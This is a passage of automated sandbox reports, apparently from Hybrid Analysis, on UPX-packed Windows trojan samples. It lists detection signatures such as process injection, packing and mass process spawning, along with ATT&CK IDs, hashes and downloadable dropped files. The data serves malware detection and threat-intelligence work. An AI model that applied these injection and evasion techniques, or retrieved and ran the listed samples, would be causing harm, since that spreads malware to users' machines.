\"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hptntt.exe]- [targetUID: 00000000-00002096]\n \"bfllh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bfllh.exe]- [targetUID: 00000000-00004172]\n \"frbnxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frbnxt.exe]- [targetUID: 00000000-00004172]\n \"htpdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\htpdr.exe]- [targetUID: 00000000-00006120]\n \"drpdftl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drpdftl.exe]- [targetUID: 00000000-00000848]\n \"tpjrfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tpjrfn.exe]- [targetUID: 00000000-00000848]\n \"0484046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0484046.exe]- [targetUID: 00000000-00006084]\n \"8288862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8288862.exe]- [targetUID: 00000000-00006084]\n \"06200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06200.exe]- [targetUID: 00000000-00002260]\n \"068466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068466.exe]- [targetUID: 00000000-00002260]\n \"4640842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640842.exe]- [targetUID: 00000000-00003512]\n \"66488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66488.exe]- [targetUID: 00000000-00003512]\n \"22428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22428.exe]- [targetUID: 00000000-00005956]\n \"lbvtbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbvtbl.exe]- [targetUID: 00000000-00005956]\n \"vxbrbpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxbrbpd.exe]- [targetUID: 00000000-00005996]\n \"hfxjvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfxjvn.exe]- [targetUID: 00000000-00005860]\n \"026026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026026.exe]- [targetUID: 00000000-00005728]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has section name UPX1 with entropy \"7.97244478673\"\n \"rfbrlrh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"blpjp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vllrv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hpjbbfh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4000248.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vptfx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dvlvp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pdljr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"brvtdb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2846688.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"488862.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"06448.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vjrdb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tdplj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"02482.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"86844.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"njnplr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jbvjrv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"djhxhx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rdtdhx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jhhhxxb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"llfppf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hxfnr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xtxdjfh.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has a section named \"UPX0\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has a section named \"UPX1\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has a section named \"UPX2\"\n \"rfbrlrh.exe\" has a section named \"UPX0\"\n \"rfbrlrh.exe\" has a section named \"UPX1\"\n \"rfbrlrh.exe\" has a section named \"UPX2\"\n \"blpjp.exe\" has a section named \"UPX0\"\n \"blpjp.exe\" has a section named \"UPX1\"\n \"blpjp.exe\" has a section named \"UPX2\"\n \"vllrv.exe\" has a section named \"UPX0\"\n \"vllrv.exe\" has a section named \"UPX1\"\n \"vllrv.exe\" has a section named \"UPX2\"\n \"hpjbbfh.exe\" has a section named \"UPX0\"\n \"hpjbbfh.exe\" has a section named \"UPX1\"\n \"hpjbbfh.exe\" has a section named \"UPX2\"\n \"4000248.exe\" has a section named \"UPX0\"\n \"4000248.exe\" has a section named \"UPX1\"\n \"4000248.exe\" has a section named \"UPX2\"\n \"vptfx.exe\" has a section named \"UPX0\"\n \"vptfx.exe\" has a section named \"UPX1\"\n \"vptfx.exe\" has a section named \"UPX2\"\n \"dvlvp.exe\" has a section named \"UPX0\"\n \"dvlvp.exe\" has a section named \"UPX1\"\n \"dvlvp.exe\" has a section named \"UPX2\"\n \"pdljr.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (UID: 00000000-00005728)\n Spawned process \"026026.exe\" (UID: 00000000-00005860)\n Spawned process \"hfxjvn.exe\" (UID: 00000000-00006136)\n Spawned process \"vxbrbpd.exe\" (UID: 00000000-00005996)\n Spawned process \"lbvtbl.exe\" (UID: 00000000-00005956)\n Spawned process \"22428.exe\" (UID: 00000000-00004388)\n Spawned process \"66488.exe\" (UID: 00000000-00003512)\n Spawned process \"4640842.exe\" (UID: 00000000-00006068)\n Spawned process \"068466.exe\" (UID: 00000000-00002260)\n Spawned process \"06200.exe\" (UID: 00000000-00006036)\n Spawned process \"8288862.exe\" (UID: 00000000-00006084)\n Spawned process \"0484046.exe\" (UID: 00000000-00005740)\n Spawned process \"tpjrfn.exe\" (UID: 00000000-00000848)\n Spawned process \"drpdftl.exe\" (UID: 00000000-00004232)\n Spawned process \"htpdr.exe\" (UID: 00000000-00006120)\n Spawned process \"frbnxt.exe\" (UID: 00000000-00004172)\n Spawned process \"bfllh.exe\" (UID: 00000000-00002096)\n Spawned process \"hptntt.exe\" (UID: 00000000-00006112)\n Spawned process \"vtrppln.exe\" (UID: 00000000-00004116)\n Spawned process \"rdttflx.exe\" (UID: 00000000-00000852)\n Spawned process \"ljvfrdn.exe\" (UID: 00000000-00004448)\n Spawned process \"ntjvt.exe\" (UID: 00000000-00002736)\n Spawned process \"lllfpll.exe\" (UID: 00000000-00003560)\n Spawned process \"lxrhrth.exe\" (UID: 00000000-00003668)\n Spawned process \"nntvf.exe\" (UID: 00000000-00001892)\n Spawned process \"806004.exe\" (UID: 00000000-00004472)\n Spawned process \"4228006.exe\" (UID: 00000000-00001372)\n Spawned process \"20402.exe\" (UID: 00000000-00004500)\n Spawned process \"046644.exe\" (UID: 00000000-00004140)\n Spawned process \"2820044.exe\" (UID: 00000000-00003812)\n Spawned process \"8600684.exe\" (UID: 00000000-00002528)\n Spawned process \"2006628.exe\" (UID: 00000000-00001880)\n Spawned process \"64860.exe\" (UID: 00000000-00003220)\n Spawned process \"fpplvv.exe\" (UID: 00000000-00004124)\n Spawned process \"dpjjvjv.exe\" (UID: 00000000-00002552)\n Spawned process \"ttldj.exe\" (UID: 00000000-00003692)\n Spawned process \"tlbnpbh.exe\" (UID: 00000000-00003424)\n Spawned process \"hjjtjd.exe\" (UID: 00000000-00001344)\n Spawned process \"rpbfjr.exe\" (UID: 00000000-00004236)\n Spawned process \"jrrhxbf.exe\" (UID: 00000000-00003456)\n Spawned process \"lfnjxdh.exe\" (UID: 00000000-00004524)\n Spawned process \"nbnxn.exe\" (UID: 00000000-00004020)\n Spawned process \"rhjvpvp.exe\" (UID: 00000000-00001844)\n Spawned process \"624082.exe\" (UID: 00000000-00004296)\n Spawned process \"42004.exe\" (UID: 00000000-00003248)\n Spawned process \"884228.exe\" (UID: 00000000-00001584)\n Spawned process \"2628204.exe\" (UID: 00000000-00001888)\n Spawned process \"004802.exe\" (UID: 00000000-00002836)\n Spawned process \"dllffdl.exe\" (UID: 00000000-00002640)\n Spawned process \"tdbrbj.exe\" (UID: 00000000-00003164)\n Spawned process \"pbnblrt.exe\" (UID: 00000000-00003228)\n Spawned process \"vrjppt.exe\" (UID: 00000000-00001920)\n Spawned process \"prbhn.exe\" (UID: 00000000-00001424)\n Spawned process \"lfhtd.exe\" (UID: 00000000-00004164)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" wrote 32 bytes to a remote process \"C:\\026026.exe\" (Handle: 64)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" wrote 52 bytes to a remote process \"C:\\026026.exe\" (Handle: 64)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" wrote 4 bytes to a remote process \"C:\\026026.exe\" (Handle: 64)\n \"026026.exe\" wrote 32 bytes to a remote process \"C:\\hfxjvn.exe\" (Handle: 116)\n \"026026.exe\" wrote 52 bytes to a remote process \"C:\\hfxjvn.exe\" (Handle: 116)\n \"026026.exe\" wrote 4 bytes to a remote process \"C:\\hfxjvn.exe\" (Handle: 116)\n \"hfxjvn.exe\" wrote 32 bytes to a remote process \"C:\\vxbrbpd.exe\" (Handle: 68)\n \"hfxjvn.exe\" wrote 52 bytes to a remote process \"C:\\vxbrbpd.exe\" (Handle: 68)\n \"hfxjvn.exe\" wrote 4 bytes to a remote process \"C:\\vxbrbpd.exe\" (Handle: 68)\n \"vxbrbpd.exe\" wrote 32 bytes to a remote process \"C:\\lbvtbl.exe\" (Handle: 116)\n \"vxbrbpd.exe\" wrote 52 bytes to a remote process \"C:\\lbvtbl.exe\" (Handle: 116)\n \"vxbrbpd.exe\" wrote 4 bytes to a remote process \"C:\\lbvtbl.exe\" (Handle: 116)\n \"lbvtbl.exe\" wrote 32 bytes to a remote process \"C:\\22428.exe\" (Handle: 116)\n \"lbvtbl.exe\" wrote 52 bytes to a remote process \"C:\\22428.exe\" (Handle: 116)\n \"lbvtbl.exe\" wrote 4 bytes to a remote process \"C:\\22428.exe\" (Handle: 116)\n \"22428.exe\" wrote 32 bytes to a remote process \"C:\\66488.exe\" (Handle: 68)\n \"22428.exe\" wrote 52 bytes to a remote process \"C:\\66488.exe\" (Handle: 68)\n \"22428.exe\" wrote 4 bytes to a remote process \"C:\\66488.exe\" (Handle: 68)\n \"66488.exe\" wrote 32 bytes to a remote process \"C:\\4640842.exe\" (Handle: 68)\n \"66488.exe\" wrote 52 bytes to a remote process \"C:\\4640842.exe\" (Handle: 68)\n \"66488.exe\" wrote 4 bytes to a remote process \"C:\\4640842.exe\" (Handle: 68)\n \"4640842.exe\" wrote 32 bytes to a remote process \"C:\\068466.exe\" (Handle: 64)\n \"4640842.exe\" wrote 52 bytes to a remote process \"C:\\068466.exe\" (Handle: 64)\n \"4640842.exe\" wrote 4 bytes to a remote process \"C:\\068466.exe\" (Handle: 64)\n \"068466.exe\" wrote 32 bytes to a remote process \"C:\\06200.exe\" (Handle: 68)\n \"068466.exe\" wrote 52 bytes to a remote process \"C:\\06200.exe\" (Handle: 68)\n \"068466.exe\" wrote 4 bytes to a remote process \"C:\\06200.exe\" (Handle: 68)\n \"06200.exe\" wrote 32 bytes to a remote process \"C:\\8288862.exe\" (Handle: 116)\n \"06200.exe\" wrote 52 bytes to a remote process \"C:\\8288862.exe\" (Handle: 116)\n \"06200.exe\" wrote 4 bytes to a remote process \"C:\\8288862.exe\" (Handle: 116)\n \"8288862.exe\" wrote 32 bytes to a remote process \"C:\\0484046.exe\" (Handle: 60)\n \"8288862.exe\" wrote 52 bytes to a remote process \"C:\\0484046.exe\" (Handle: 60)\n \"8288862.exe\" wrote 4 bytes to a remote process \"C:\\0484046.exe\" (Handle: 60)\n \"0484046.exe\" wrote 32 bytes to a remote process \"C:\\tpjrfn.exe\" (Handle: 60)\n \"0484046.exe\" wrote 52 bytes to a remote process \"C:\\tpjrfn.exe\" (Handle: 60)\n \"0484046.exe\" wrote 4 bytes to a remote process \"C:\\tpjrfn.exe\" (Handle: 60)\n \"tpjrfn.exe\" wrote 32 bytes to a remote process \"C:\\drpdftl.exe\" (Handle: 68)\n \"tpjrfn.exe\" wrote 52 bytes to a remote process \"C:\\drpdftl.exe\" (Handle: 68)\n \"tpjrfn.exe\" wrote 4 bytes to a remote process \"C:\\drpdftl.exe\" (Handle: 68)\n \"drpdftl.exe\" wrote 32 bytes to a remote process \"C:\\htpdr.exe\" (Handle: 60)\n \"drpdftl.exe\" wrote 52 bytes to a remote process \"C:\\htpdr.exe\" (Handle: 60)\n \"drpdftl.exe\" wrote 4 bytes to a remote process \"C:\\htpdr.exe\" (Handle: 60)\n \"htpdr.exe\" wrote 32 bytes to a remote process \"C:\\frbnxt.exe\" (Handle: 60)\n \"htpdr.exe\" wrote 52 bytes to a remote process \"C:\\frbnxt.exe\" (Handle: 60)\n \"htpdr.exe\" wrote 4 bytes to a remote process \"C:\\frbnxt.exe\" (Handle: 60)\n \"frbnxt.exe\" wrote 32 bytes to a remote process \"C:\\bfllh.exe\" (Handle: 60)\n \"frbnxt.exe\" wrote 52 bytes to a remote process \"C:\\bfllh.exe\" (Handle: 60)\n \"frbnxt.exe\" wrote 4 bytes to a remote process \"C:\\bfllh.exe\" (Handle: 60)\n \"bfllh.exe\" wrote 32 bytes to a remote process \"C:\\hptntt.exe\" (Handle: 116)\n \"bfllh.exe\" wrote 52 bytes to a remote process \"C:\\hptntt.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"fvjlh.exe\" allocated memory in \"c:\\fvjlh.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea
https://hybrid-analysis.com/sample/0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea
Hybrid Analysis - Infostealers
{"size": 342135, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea", "sha256": "0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 98, "extracted_files": [{"name": "0248006.exe", "file_path": "C:\\0248006.exe", "file_size": 343051, "sha256": "d928429c64ec23a8c2043e85ef9c2c9afcb357b35dfc1845f00a3040d025b0d9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08802.exe (PID: 3536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0284862.exe", "file_path": "C:\\0284862.exe", "file_size": 342975, "sha256": "4da188d1765604059ae5890d9f52ba7043f31e2cd209f5e484999c1065b4324d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0284862.exe (PID: 1692)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "028488.exe", "file_path": "C:\\028488.exe", "file_size": 342481, "sha256": "266cb3d80a3ba360fde253e5e163a676cfb80512f5a19639a3575fc53e16f372", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "028488.exe (PID: 4388)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04466.exe", "file_path": "C:\\04466.exe", "file_size": 342556, "sha256": "377ea4f33c52fd3c35d676c3502c33d9b62ac6fed4d76e3128429f0d35711fe2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04466.exe (PID: 4408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "084808.exe", "file_path": "C:\\084808.exe", "file_size": 342956, "sha256": "90ee652f35ab25db6c76c8d87e464ca03d2c8694e2e7f1ddaa281fb93cfc2401", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64644.exe (PID: 896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0862264.exe", "file_path": "C:\\0862264.exe", "file_size": 342296, "sha256": "0d2a04a0a14758cc5749e91c77d770f67ed1c46ee734f65db3c84fbf7a617388", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "txphbj.exe (PID: 4160)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "086684.exe", "file_path": "C:\\086684.exe", "file_size": 342911, "sha256": "61e9f5ec82e35b2a9a3ae7730214b03cadc19709b296a2c730db308cedc30dcb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "260604.exe (PID: 552)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08802.exe", "file_path": "C:\\08802.exe", "file_size": 343039, "sha256": "688762b2658be033dacc28f8fc2378daae80e77ed695fe4e321a0d1c37bbba17", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08802.exe (PID: 3536)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "088400.exe", "file_path": "C:\\088400.exe", "file_size": 342574, "sha256": "ab30a6ed56fad6f86c413a4cc93ecaf13ddc97aeadd72da4edcef8eb097404ac", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04466.exe (PID: 4408)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "202828.exe", "file_path": "C:\\202828.exe", "file_size": 342198, "sha256": "b09e7e465b9af314846aa3777e082ad4d86b8bc8da33d0414cd3938c8348ded1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22420.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2204222.exe", "file_path": "C:\\2204222.exe", "file_size": 342462, "sha256": "e3b66ff894f756bdc70c95cb40fe062a2fac326a4c15250a6678594b1d1a7e73", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2204222.exe (PID: 3500)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22420.exe", "file_path": "C:\\22420.exe", "file_size": 342182, "sha256": "33addde1b4cfdeab0313103776d6929a556f464d149882c120671703b269c047", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22420.exe (PID: 6096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "226688.exe", "file_path": "C:\\226688.exe", "file_size": 343078, "sha256": "83c141f24448065138a994992894a448a37b822810ed52eaf4aff796d53bb256", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "88406.exe (PID: 1524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22884.exe", "file_path": "C:\\22884.exe", "file_size": 342517, "sha256": "8f34dffe82bc0025bc5836ca800187f0c3e30e62259961232b49aab930d2f355", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "22884.exe (PID: 3556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "242662.exe", "file_path": "C:\\242662.exe", "file_size": 342989, "sha256": "6b52bc5636db1dbe2ae480f692437778c8c34206d69afd5d66fc53919819eeb3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "242662.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24440.exe", "file_path": "C:\\24440.exe", "file_size": 343020, "sha256": "3e82d02864687fe371b3d0a74b8895b11973e2444c5ee6b317d75799cbbb5520", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24440.exe (PID: 3628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2466400.exe", "file_path": "C:\\2466400.exe", "file_size": 342541, "sha256": "b4207c79f2ec89ae1a35d7060337235087ddf11fc30e5aacdfd7adf45fc30a26", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2466400.exe (PID: 2268)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "260604.exe", "file_path": "C:\\260604.exe", "file_size": 342898, "sha256": "52d0514d20505251e589a2136a4d031d61534f718eecfbb0f1ce055f656bd9c6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ndnvbhn.exe (PID: 1376)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2662206.exe", "file_path": "C:\\2662206.exe", "file_size": 342148, "sha256": "8ea4e8e58218a5bfc0231892ac40896e716bd50452874e0eeff6bf0754a64241", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe (PID: 5820)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2668286.exe", "file_path": "C:\\2668286.exe", "file_size": 342168, "sha256": "9065c124c98bdc859506b64fc4d486764caaa84f728af64d508cd31cf39a7d36", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2662206.exe (PID: 5996)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "444866.exe", "file_path": "C:\\444866.exe", "file_size": 342590, "sha256": "84812775b5fe610f808dd230cfd8ca53525ac780fb7a56d53a141b66522ea27b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "088400.exe (PID: 4248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44882.exe", "file_path": "C:\\44882.exe", "file_size": 342423, "sha256": "e2635af2b213b7de8101fa66cf6c8816606744927958e07ac33713403677ef10", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "82880.exe (PID: 1976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "46228.exe", "file_path": "C:\\46228.exe", "file_size": 343090, "sha256": "72fac6bf97339aabded9ed505e1d2e9f7f290ba581faaffd633efdc87ff24ecd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "226688.exe (PID: 4524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6042668.exe", "file_path": "C:\\6042668.exe", "file_size": 342306, "sha256": "c7e56240b3e464aa512590162c12a33b7cb78005db3fec12c1e5992f57ed8935", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6042668.exe (PID: 5956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6266488.exe", "file_path": "C:\\6266488.exe", "file_size": 342708, "sha256": "e6b9ce76bcd87369967d5fed942b665c99bd376ff9a1a8dcc2101ee4a135aef1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6266488.exe (PID: 3380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "62820.exe", "file_path": "C:\\62820.exe", "file_size": 342492, "sha256": "19986840852452be9fd7998396e519292130cc6906337bdd4febdd209a2800e8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "62820.exe (PID: 3968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6408002.exe", "file_path": "C:\\6408002.exe", "file_size": 342316, "sha256": "87f0b72c1a7393f3c3c23e01cc5f55445bd075546e2ad8abaa88b7651b4093c2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6042668.exe (PID: 5956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6460462.exe", "file_path": "C:\\6460462.exe", "file_size": 343000, "sha256": "b0b05a56a1c0c790fd844d4952e7b524240a382f730367f7ee981d6baf1b38e9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "242662.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64644.exe", "file_path": "C:\\64644.exe", "file_size": 342936, "sha256": "f77a05e5ca7f684ec70c758793c773477809651f1b9b175eec73479a0492c899", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64644.exe (PID: 896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66822.exe", "file_path": "C:\\66822.exe", "file_size": 342609, "sha256": "f93e66c04383cc981ae486a64716f59f79fce5bc409fd33e10b051ef7baa8468", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66822.exe (PID: 2164)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "80840.exe", "file_path": "C:\\80840.exe", "file_size": 342503, "sha256": "1b0538a459823d5a557bf9270b5eb163e84683052c6f6250405449bccdc960bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "62820.exe (PID: 3968)", "threat_level_readable": "no specific threat", 